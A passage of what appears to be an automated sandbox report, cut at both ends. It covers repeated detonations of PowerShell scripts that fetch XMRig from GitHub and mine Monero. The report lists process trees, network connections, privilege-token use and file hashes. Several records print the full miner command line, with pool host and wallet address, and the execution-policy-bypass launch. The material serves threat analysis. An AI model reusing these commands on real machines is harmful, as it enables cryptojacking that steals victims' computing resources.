Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 174.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v3dwu0dw.hlq.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:40

Platform

win7-20231129-en

Max time kernel

1559s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Network

N/A

Files

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:40

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
NL 52.111.243.31:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pmbrkdz5.d2k.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:23

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s2tepunc.5yf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:35

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 48.192.11.51.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lu5nku1r.ujj.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:36

Platform

win10v2004-20240508-en

Max time kernel

1684s

Max time network

1693s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cmelzcau.ids.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral21

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:44

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ovvykolq.ems.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral29

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:48

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o2conkjh.d2u.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:40

Platform

win10v2004-20240508-en

Max time kernel

1794s

Max time network

1803s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3440,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=4404 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1392,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=4432 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x4h3lwc5.au2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:42

Platform

win11-20240508-en

Max time kernel

1673s

Max time network

1684s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4hamumf1.jgs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral22

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:44

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

